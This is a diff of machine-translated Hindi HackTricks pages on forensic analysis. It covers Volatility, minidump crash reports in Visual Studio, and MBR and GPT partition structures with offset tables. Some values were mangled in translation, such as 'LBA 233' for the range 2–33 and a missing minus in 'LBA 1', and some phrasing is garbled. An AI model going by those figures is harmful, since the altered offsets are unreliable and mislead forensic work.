@ -2,40 +2,68 @@
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप किसी **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS की नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने** की उपलब्धता चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी हैकट्रिक्स में विज्ञापित हो**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड** करना चाहते हैं? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह देखें * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में **शामिल हों** या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** अनुसरण करें। * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **पालन** करें।
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके अपना योगदान दें।** * **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud)** में पीआर जमा करके।
</details> </details>
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure> <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा इवेंट है और यूरोप में सबसे महत्वपूर्ण में से एक है। तकनीकी ज्ञान को बढ़ावा देने की मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उबलता हुआ मिलन स्थल है। [**RootedCON**](https://www.rootedcon.com/) **स्पेन** में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और **यूरोप** में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह सम्मेलन प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उफान मिलने का समारोह है।
{% embed url="https://www.rootedcon.com/" %} {% embed url="https://www.rootedcon.com/" %}
## प्रारंभ ## प्रारंभ
पीकैप में **मैलवेयर** खोजना शुरू करें। [**मैलवेयर विश्लेषण**](../malware-analysis.md) में उल्लिखित **उपकरण** का उपयोग करें। पीकैप के अंदर **मैलवेयर** खोजना शुरू करें। [**मैलवेयर विश्लेषण**](../malware-analysis.md) में उल्लिखित **उपकरणों** का उपयोग करें।
## [Volatility](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md) ## [Volatility](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)
मेमोरी डंप विश्लेषण के लिए प्रीमियर ओपन-सोर्स फ्रेमवर्क है [Volatility](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)। Volatility एक Python स्क्रिप्ट है जो बाहरी उपकरण (या वीएमवेयर मेमोरी इमेज जो वीएम को रोककर इकट्ठा किया गया है) के साथ इकट्ठा किए गए मेमोरी डंप को पार्स करने के लिए है। तो, मेमोरी डंप फ़ाइल और प्रासंगिक "प्रोफ़ाइल" (जिससे डंप इकट्ठा किया गया था वह ओएस), Volatility डेटा में संरचनाएँ पहचानना शुरू कर सकता है: चल रहे प्रक्रियाएँ, पासवर्ड, आदि। यह भी विभिन्न प्लगइन का उपयोग करके विभिन्न प्रकार के आर्टिफैक्ट निकालने के लिए विस्तारयोग्य है।\ **Volatility मेमोरी डंप विश्लेषण के लिए मुख्य ओपन-सोर्स फ्रेमवर्क है**। यह Python टूल बाह्य स्रोतों या VMware VM से डंप का विश्लेषण करता है, जिसमें डंप के ओएस प्रोफ़ाइल के आधार पर प्रक्रियाएँ और पासवर्ड जैसे डेटा की पहचान करता है। यह प्लगइन के साथ विस्तारणयोग्य है, जिससे यह फोरेंसिक जांचों के लिए अत्यधिक विविध है।
स्रोत: [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/)
**[यहाँ एक चीटशीट पाएं](../../../generic-methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet.md)**
## मिनी डंप क्रैश रिपोर्ट ## मिनी डंप क्रैश रिपोर्ट
जब डंप छोटा होता है (कुछ KB, शायद कुछ MB) तो यह शायद एक मिनी डंप क्रैश रिपोर्ट होता है और न कि मेमोरी डंप। जब डंप छोटा होता है (कुछ KB, शायद कुछ MB) तो यह शायद एक मिनी डंप क्रैश रिपोर्ट होता है और न कि एक मेमोरी डंप।
![](<../../../.gitbook/assets/image (216).png>) ![](<../../../.gitbook/assets/image (216).png>)
यदि आपके पास Visual Studio स्थापित है, तो आप इस फ़ाइल को खोल सकते हैं और कुछ मूलभूत जानकारी जैसे प्रक्रिया का नाम, आर्किटेक्चर, अपवाद जानकारी और मॉड्यूल्स को बाइंड कर सकते हैं: अगर आपके पास विजुअल स्टूडियो स्थापित है, तो आप इस फ़ाइल को खोल सकते हैं और प्रक्रिया का नाम, वास्तुकला, अपवाद जानकारी और मॉड्यूल जैसी कुछ मूल जानकारी जोड़ सकते हैं:
![](<../../../.gitbook/assets/image (217).png>) ![](<../../../.gitbook/assets/image (217).png>)
आप अपवाद को भी लोड कर सकते हैं और आप अपवाद को भी लोड कर सकते हैं और डीकॉम्पाइल की गई निर्देशिकाएँ देख सकते हैं
* **अपनी हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**
![](<../../../.gitbook/assets/image (219).png>)
![](<../../../.gitbook/assets/image (218) (1).png>)
वैसे, विजुअल स्टूडियो डंप की गहराई का विश्लेषण करने के लिए सर्वश्रेष्ठ उपकरण नहीं है।
आपको इसे **आईडीए** या **राडारे** का उपयोग करके गहराई में जांचने की चाहिए।
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) **स्पेन** में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और **यूरोप** में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह सम्मेलन प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उफान मिलने का समारोह है।
{% embed url="https://www.rootedcon.com/" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी हैकट्रिक्स में विज्ञापित हो**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड** करना चाहते हैं? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह देखें
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **पालन** करें।
* **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud)** में पीआर जमा करके।
</details>

View file

@ -8,30 +8,30 @@
HackTricks का समर्थन करने के अन्य तरीके: HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! * यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें। * **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें और PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में। * **हैकिंग ट्रिक्स साझा करें और PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos का सर्थन करें।
</details> </details>
## Partitions ## Partitions
एक हार्ड ड्राइव या एक **SSD डिस्क में विभिन्न पार्टीशन** हो सकते हैं जिनका उद्देश्य डेटा को भौतिक रूप से अलग करना है।\ एक हार्ड ड्राइव या एक **SSD डिस्क विभिन्न पार्टीशन** शारीरिक रूप से डेटा को अलग करने के उद्देश्य से रख सकता है।\
डिस्क की **न्यूनतम** इकाई सेक्टर है (सामान्य रूप से 512B से बना होता है)। इसलिए, प्रत्येक पार्टीशन का आकार उस आकार की गुणाकार होनी चाहिए। डिस्क की **न्यूनतम** इकाई सेक्टर है (सामान्य रूप से 512B से बना होता है)। इसलिए, प्रत्येक पार्टीशन का आकार उस आकार की गुणाकार होनी चाहिए।
### MBR (मास्टर बूट रिकॉर्ड) ### MBR (मास्टर बूट रिकॉर्ड)
यह **डिस्क के पहले सेक्टर में आवंटित किया गया है 446B के बूट कोड के बाद**यह सेक्टर PC को इंडिकेट करने के लिए महत्वपूर्ण है कि क्या और कहां से पार्टीशन माउंट किया जाना चाहिए।\ यह **डिस्क के पहले सेक्टर में आवंटित किया गया है 446B के बूट कोड के बाद**इस सेक्टर का महत्वपूर्ण है क्योंकि यह PC को बताता है कि क्या और कहाँ से पार्टीशन माउंट किया जाना चाहिए।\
इसमें **4 पार्टीशन** (अधिकतम **केवल 1** सक्रिय/**बूटेबल**) की अनुमति है। हालांकि, यदि आपको अधिक पार्टीशन की आवश्यकता है तो आप **विस्तारित पार्टीशन** का उपयोग कर सकते हैं। इस पहले सेक्टर का अंतिम बाइट बूट रिकॉर्ड सिग्नेचर **0x55AA** है। केवल एक पार्टीशन को सक्रिय चिह्नित किया जा सकता है।\ इसमें **4 पार्टीशनों** की अनुमति है (अधिकतम **केवल 1** सक्रिय/**बूटेबल** हो सकती है)। हालांकि, यदि आपको अधिक पार्टीशन चाहिए हो सकता है तो आप **विस्तारित पार्टीशन** का उपयोग कर सकते हैं। इस पहले सेक्टर का अंतिम बाइट बूट रिकॉर्ड सिग्नेचर **0x55AA** है। केवल एक पार्टीशन को सक्रिय चिह्नित किया जा सकता है।\
MBR **अधिकतम 2.2TB** की अनुमति देता है। MBR अधिकतम **2.2TB** की अनुमति देता है।
![](<../../../.gitbook/assets/image (489).png>) ![](<../../../.gitbook/assets/image (489).png>)
![](<../../../.gitbook/assets/image (490).png>) ![](<../../../.gitbook/assets/image (490).png>)
**बाइट्स 440 से 443** तक MBR में आप **Windows Disk Signature** (यदि Windows का उपयोग किया जाता है) पा सकते हैं। हार्ड डिस्क का तार्किक ड्राइव पत्र Windows Disk Signature पर निर्भर करता है। इस सिग्नेचर को बदलने से Windows को बूट करने से रोका जा सकता है (उपकरण: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**। **बाइट्स 440 से 443** तक MBR में आप **Windows Disk Signature** (यदि Windows का उपयोग किया गया है) पा सकते हैं। हार्ड डिस्क का तार्किक ड्राइव पत्र Windows Disk Signature पर निर्भर करता है। इस सिग्नेचर को बदलने से Windows को बूट करने से रोका जा सकता है (उपकरण: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**)**।
![](<../../../.gitbook/assets/image (493).png>) ![](<../../../.gitbook/assets/image (493).png>)
@ -53,11 +53,11 @@ MBR **अधिकतम 2.2TB** की अनुमति देता है
| 0 (0x00) | 1 (0x01) | सक्रिय ध्वज (0x80 = बूटेबल) | | 0 (0x00) | 1 (0x01) | सक्रिय ध्वज (0x80 = बूटेबल) |
| 1 (0x01) | 1 (0x01) | प्रारंभ हेड | | 1 (0x01) | 1 (0x01) | प्रारंभ हेड |
| 2 (0x02) | 1 (0x01) | प्रारंभ सेक्टर (बिट्स 0-5); सिलेंडर के ऊपरी बिट्स (6- 7) | | 2 (0x02) | 1 (0x01) | प्रारंभ सेक्टर (बिट्स 0-5); सिलेंडर के ऊपरी बिट्स (6- 7) |
| 3 (0x03) | 1 (0x01) | प्रारंभ सिलेंडर कम से कम 8 बिट्स | | 3 (0x03) | 1 (0x01) | प्रारंभ सिलेंडर कम से कम 8 बिट |
| 4 (0x04) | 1 (0x01) | पार्टीशन प्रकार कोड (0x83 = लिनक्स) | | 4 (0x04) | 1 (0x01) | पार्टीशन प्रकार कोड (0x83 = लिनक्स) |
| 5 (0x05) | 1 (0x01) | अंत हेड | | 5 (0x05) | 1 (0x01) | अंत हेड |
| 6 (0x06) | 1 (0x01) | अंत सेक्टर (बिट्स 0-5); सिलेंडर के ऊपरी बिट्स (6- 7) | | 6 (0x06) | 1 (0x01) | अंत सेक्टर (बिट्स 0-5); सिलेंडर के ऊपरी बिट (6- 7) |
| 7 (0x07) | 1 (0x01) | अंत सिलेंडर कम से कम 8 बिट्स | | 7 (0x07) | 1 (0x01) | अंत सिलेंडर कम से कम 8 बिट |
| 8 (0x08) | 4 (0x04) | पार्टीशन से पहले के सेक्टर (लिटिल इंडियन) | | 8 (0x08) | 4 (0x04) | पार्टीशन से पहले के सेक्टर (लिटिल इंडियन) |
| 12 (0x0C) | 4 (0x04) | पार्टीशन में सेक्टर | | 12 (0x0C) | 4 (0x04) | पार्टीशन में सेक्टर |
@ -74,53 +74,58 @@ mount -o ro,loop,offset=32256,noatime /path/to/image.dd /media/part/
``` ```
**LBA (Logical block addressing)** **LBA (Logical block addressing)**
**लॉजिकल ब्लॉक पता** (**LBA**) कंप्यूटर स्टोरेज उपकरणों पर डेटा ब्लॉक की स्थान सूचित करने के लिए एक सामान्य योजना है, जो मुख्य रूप से हार्ड डिस्क ड्राइव जैसे द्वितीय स्टोरेज सिस्टम पर उपयोग की जाती है। LBA एक विशेष रैखिक पता योजना है; **ब्लॉक को एक पूर्णांक सूची द्वारा खोजा जाता है**, पहला ब्लॉक LBA 0, दूसरा LBA 1, और इसी प्रकार। **लॉजिकल ब्लॉक पता** (**LBA**) कंप्यूटर स्टोरेज उपकरणों पर डेटा ब्लॉक की स्थान सूचित करने के लिए एक सामान्य योजना है, जो मुख्य रूप से हार्ड डिस्क ड्राइव जैसे द्वितीय स्टोरेज सिस्टम पर स्टोर किए गए डेटा ब्लॉक की स्थान सूचित करने के लिए प्रयुक्त है। LBA एक विशेष रूप से सरल रैखिक पता योजना है; **ब्लॉक को एक पूर्णांक सूची द्वारा स्थानित किया जाता है**, पहला ब्लॉक LBA 0 होता है, दूसरा LBA 1, और इसी प्रकार।
### GPT (GUID Partition Table) ### GPT (GUID Partition Table)
इसे GUID Partition Table कहा जाता है क्योंकि आपके ड्राइव पर हर पार्टीशन का **वैश्विक अद्वितीय पहचानकर्ता** होता है। GUID Partition Table, जिसे GPT के रूप में जाना जाता है, MBR (Master Boot Record) की तुलना में उन्नत क्षमताओं के लिए पसंद की जाती है। विभाजनों के लिए **वैश्विक अद्वितीय पहचानकर्ता** के लिए प्रसिद्ध GPT कई तरीकों में उभरता है:
MBR की तरह यह **सेक्टर 0** में शुरू होता है। MBR 32 बिट का होता है जबकि **GPT** 64 बिट का है।\ - **स्थान और आकार**: GPT और MBR दोनों **सेक्टर 0** से प्रारंभ होते हैं। हालांकि, GPT **64 बिट** पर काम करता है, जो MBR के 32 बिट के विपरीत है।
GPT **Windows में 128 पार्टीशनों** और **9.4ZB** तक की अनुमति देता है।\ - **विभाजन सीमाएं**: GPT विंडोज सिस्टम पर **128 विभाजन** तक समर्थन प्रदान करता है और **9.4ZB** तक के डेटा को समर्थन करता है।
इसके अलावा, पार्टीशनों के पास 36 वर्णों का यूनिकोड नाम हो सकता है। - **विभाजन नाम**: 36 यूनिकोड वर्णों के साथ विभाजनों को नाम देने की क्षमता प्रदान करता है।
MBR डिस्क पर, पार्टीशनिंग और बूट डेटा एक ही स्थान में स्टोर होते हैं। अगर यह डेटा ओवरराइट या करप्ट हो जाता है, तो आप मुश्किल में पड़ सकते हैं। विपरीत, **GPT डिस्क पर इस डेटा के कई प्रतियां** स्टोर होती हैं, इसलिए यह बहुत अधिक मजबूत है और यदि डेटा करप्ट हो जाता है तो उसे डिस्क पर दूसरे स्थान से **पुनर्स्थापित करने का प्रयास** कर सकता है। **डेटा सहायता और पुनर्प्राप्ति**:
GPT अपने डेटा की सुरक्षा के लिए **साइक्लिक रेडंडेंसी चेक (CRC)** मानों को स्टोर करता है। यदि डेटा करप्ट हो जाता है, तो GPT समस्या को नोटिस कर सकता है और डिस्क पर दूसरे स्थान से **क्षतिग्रस्त डेटा को पुनर्स्थापित करने का प्रयास** कर सकता है। - **पुनर्निर्देशन**: MBR की तुलना में, GPT विभाजन और बूट डेटा को एक ही स्थान पर सीमित नहीं करता है। यह डेटा को डिस्क पर फैलाता है, जिससे डेटा की अखंडता और सहायता मजबूत होती है।
- **साइक्लिक रीडंडेंसी चेक (CRC)**: GPT डेटा अखंडता सुनिश्चित करने के लिए CRC का उपयोग करता है। यह डेटा के कोरप्ट होने की गतिविधि के लिए सक्रिय रूप से मॉनिटर करता है, और जब इसे पता चलता है, तो GPT को दूसरे डिस्क स्थान से कोरप्ट हुए डेटा को पुनर्प्राप्त करने का प्रयास करता है।
**प्रोटेक्टिव MBR (LBA0)** **सुरक्षित MBR (LBA0)**:
पुरानी वापसी के लिए, पुराने MBR का जगह GPT विनिर्देश में अभी भी सुरक्षित रखा गया है, लेकिन यह अब एक ऐसे **तरीके से उपयोग किया जाता है जो MBR आधारित डिस्क उपयोगकर्ताओं को गलत समझने और संभावित रूप से GPT डिस्क को ओवरराइट करने से रोकता है**। इसे प्रोटेक्टिव MBR के रूप में संदर्भित किया जाता है। - GPT पुराने MBR परिसर में सुरक्षित MBR के माध्यम से पिछले संगतता को बनाए रखता है। यह सुविधा विभाजित GPT डिस्कों पर डेटा अखंडता की सुरक्षा करने के लिए गलती से GPT डिस्क को ओवरराइट करने से बचाती है, इसलिए GPT-स्वरूपित डिस्क पर डेटा अखंडता की सुरक्षा करती है।
![](<../../../.gitbook/assets/image (491).png>) ![https://upload.wikimedia.org/wikipedia/commons/thumb/0/07/GUID_Partition_Table_Scheme.svg/800px-GUID_Partition_Table_Scheme.svg.png](<../../../.gitbook/assets/image (491).png>)
**हाइब्रिड MBR (LBA 0 + GPT)** **हाइब्रिड MBR (LBA 0 + GPT)**
ऑपरेटिंग सिस्टम में जो **BIOS के माध्यम से GPT आधारित बूट** का समर्थन करते हैं, पहला सेक्टर भी **बूटलोडर** कोड को स्टोर करने के लिए उपयोग किया जा सकता है, लेकिन **संशोधित** करके **GPT पार्टीशनों** को पहचानने के लिए। MBR में बूटलोडर को 512 बाइट का सेक्टर आकार मानना नहीं चाहिए। [Wikipedia से](https://en.wikipedia.org/wiki/GUID_Partition_Table)
**पार्टीशन तालिका हेडर (LBA 1)** जो ऑपरेटिंग सिस्टम GPT-आधारित बूट के माध्यम से BIOS सेवाएं का समर्थन करते हैं, पहला सेक्टर आमतौर पर **बूटलोडर** कोड का पहला चरण स्टोर करने के लिए भी उपयोग किया जा सकता है, लेकिन **संशोधित** करके **GPT विभाजनों** को पहचानने के लिए। MBR में बूटलोडर को 512 बाइट के सेक्टर का आधार मानना नहीं चाहिए।
पार्टीशन तालिका हेडर डिस्क पर उपयोग के ब्लॉक को परिभाषित करता है। यह भी पार्टीशन तालिका का हिस्सा बनाने वाले पार्टीशन प्रविष्टियों की संख्या और आकार को परिभाषित करता है (तालिका में ऑफसेट 80 और 84)। **विभाजन सारणी हेडर (LBA 1)**
[Wikipedia से](https://en.wikipedia.org/wiki/GUID_Partition_Table)
विभाजन सारणी हेडर डिस्क पर उपयोगी ब्लॉकों को परिभाषित करता है। यह भी विभाजन सारणी का हिस्सा बनाने वाले विभाजन प्रविष्टियों की संख्या और आकार को परिभाषित करता है (टेबल में 80 और 84 का ऑफसेट)।
| ऑफसेट | लंबाई | सामग्री | | ऑफसेट | लंबाई | सामग्री |
| --------- | -------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | --------- | -------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 0 (0x00) | 8 बाइट | हस्ताक्षर ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h या 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#cite\_note-8)लिटिल-एंडियन मशीनों पर) | | 0 (0x00) | 8 बाइट | हस्ताक्षर ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h या 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID\_Partition\_Table#cite\_note-8)लिटिल-एंडियन मशीनों पर) |
| 8 (0x08) | 4 बाइट | संशोधन 1.0 (00h 00h 01h 00h) UEFI 2.8 के लिए | | 8 (0x08) | 4 बाइट | संशोधन 1.0 (00h 00h 01h 00h) यूईएफआई 2.8 के लिए |
| 12 (0x0C) | 4 बाइट | हेडर साइज लिटिल एंडियन में (बाइट में, सामान्यत: 5Ch 00h 00h 00h या 92 बाइट) | | 12 (0x0C) | 4 बाइट | हेडर का आकार लिटिल एंडियन में (बाइट में, सामान्यत: 5Ch 00h 00h 00h या 92 बाइट) |
| 16 (0x10) | 4 बाइट | [CRC32](https://en.wikipedia.org/wiki/CRC32) हेडर का (ऑफसेट +0 से हेडर साइज तक) हेडर का लिटिल एंडियन में, जिसमें इस क्षेत्र को हिसाब से शून्य किया जाता है। | | 16 (0x10) | 4 बाइट | [CRC32](https://en.wikipedia.org/wiki/CRC32) हेडर का (ऑफसेट +0 से हेडर का आकार तक) लिटिल एंडियन में, जिसमें इस क्षेत्र को हिसाब से शून्य किया जाता है। |
| 20 (0x14) | 4 बाइट | रिजर्व्ड; शून्य होना चाहिए | | 20 (0x14) | 4 बाइट | आरक्षित; शून्य होना चाहिए |
| 24 (0x18) | 8 बाइट | वर्तमान LBA (इस हेडर कॉपी क स्थान) | | 24 (0x18) | 8 बाइट | वर्तमान LBA (इस हेडर कॉपी क स्थान) |
| 32 (0x20) | 8 बाइट | बैकअप LBA (दूसरे हेडर की कॉपी क स्थान) | | 32 (0x20) | 8 बाइट | बैकअप LBA (दूसरे हेडर की कॉपी क स्थान) |
| 40 (0x28) | 8 बाइट | पार्टीशनों के लिए पहला उपयोगी LBA (प्राथमिक पार्टीशन तालिका का अंतिम LBA + 1) | | 40 (0x28) | 8 बाइट | विभाजनों के लिए पहला उपयोगी LBA (प्राथमिक विभाजन सारणी का अंतिम LBA + 1) |
| 48 (0x30) | 8 बाइट | अंतिम उपयोगी LBA (द्वितीय पार्टीशन तालिका का पहला LBA 1) | | 48 (0x30) | 8 बाइट | अंतिम उपयोगी LBA (द्वितीय विभाजन सारणी का पहला LBA 1) |
| 56 (0x38) | 16 बाइट | डिस्क GUID मिक्स्ड एंडियन में | | 56 (0x38) | 16 बाइट | डिस्क GUID मिक्स्ड एंडियन में |
| 72 (0x48) | 8 बाइट | पार्टीशन प्रविष्टियों के एक एरे की प्रारंभिक LBA (हमेशा प्राथमिक कॉपी में 2) | | 72 (0x48) | 8 बाइट | पार्टीशन प्रविष्टियों के एक एरे की प्रारंभिक LBA (हमेशा प्राथमिक कॉपी में 2) |
| 80 (0x50) | 4 बाइट | एरे में पार्टीशन प्रविष्टियों की संख्या | | 80 (0x50) | 4 बाइट | एरे में पार्टीशन प्रविष्टियों की संख्या |
| 84 (0x54) | 4 बाइट | एकल पार्टीशन प्रविष्टि का आकार (सामान्यत: 80h या 128) | | 84 (0x54) | 4 बाइट | एकल पार्टीशन प्रविष्टि का आकार (सामान्यत: 80h या 128) |
| 88 (0x58) | 4 बाइट | पार्टीशन प्रविष्टियों एरे का CRC32 लिटिल एंडियन में | | 88 (0x58) | 4 बाइट | पार्टीशन प्रविष्टियों के एरे का CRC32 लिटिल एंडियन में |
| 92 (0x5C) | \* | रिजर्व्ड; बाकी ब्लॉक के लिए शून्य होना चाहिए (512 बाइट के सेक्टर आकार के लिए 420 बाइट; लेकिन अधिक बड़े सेक्टर आकार के साथ अधिक हो सकता है) | | 92 (0x5C) | \* | आरक्षित; बाकी ब्लॉक के लिए शून्य होना चाहिए (512 बाइट के सेक्टर के लिए 420 बाइट; लेकिन अधिक बड़े सेक्टर के साथ अधिक हो सकता है) |
**पार्टीशन प्रविष्टियाँ (LBA 233)** **विभाजन प्रविष्टियाँ (LBA 233)**
| GUID पार्टीशन प्रविष्टि प्रारूप | | | | GUID पार्टीशन प्रविष्टि प्रारूप | | |
| --------------------------- | -------- | ----------------------------------------------------------------------------------------------------------------- | | --------------------------- | -------- | ----------------------------------------------------------------------------------------------------------------- |
@ -129,19 +134,15 @@ GPT अपने डेटा की सुरक्षा के लिए **
| 16 (0x10) | 16 बाइट | अद्वितीय पार्टीशन GUID (मिक्स्ड एंडियन) | | 16 (0x10) | 16 बाइट | अद्वितीय पार्टीशन GUID (मिक्स्ड एंडियन) |
